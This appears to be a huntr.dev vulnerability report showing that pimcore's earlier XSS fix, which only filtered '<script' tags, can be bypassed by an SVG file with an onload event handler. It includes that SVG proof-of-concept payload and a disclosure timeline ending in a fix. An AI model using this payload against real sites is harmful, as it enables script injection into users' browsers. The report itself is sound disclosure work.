Exposure of Sensitive Information to an Unauthorized Actor in pimcore/pimcore

Valid

Reported on

Jan 20th 2022

Description

XSS

Proof of Concept

Previous bug https://huntr.dev/bounties/96506857-06bc-4c84-88b7-4f397715bcf6/ is not properly fixed. it can be bypassed using with event handler . https://github.com/pimcore/pimcore/commit/35d1853baf64d6a1d90fd8803e52439da53a3911 its only checking <script tag which will be bypassed using onload event handler

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg" onload="alert()">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
</svg>

We are processing your report and will contact the pimcore team within 24 hours. a year ago

We have contacted a member of the pimcore team and are waiting to hear back 10 months ago

We have sent a follow up to the pimcore team. We will try again in 7 days. 10 months ago

We have sent a second follow up to the pimcore team. We will try again in 10 days. 10 months ago

We have sent a third and final follow up to the pimcore team. This report is now considered stale. 10 months ago

JiaJia Ji validated this vulnerability 10 months ago

ranjit-git has been awarded the disclosure bounty

The fix bounty is now up for grabs

JiaJia Ji marked this as fixed in 10.3.1 with commit 7697f7 10 months ago

JiaJia Ji has been awarded the fix bounty

This vulnerability will not receive a CVE

to join this conversation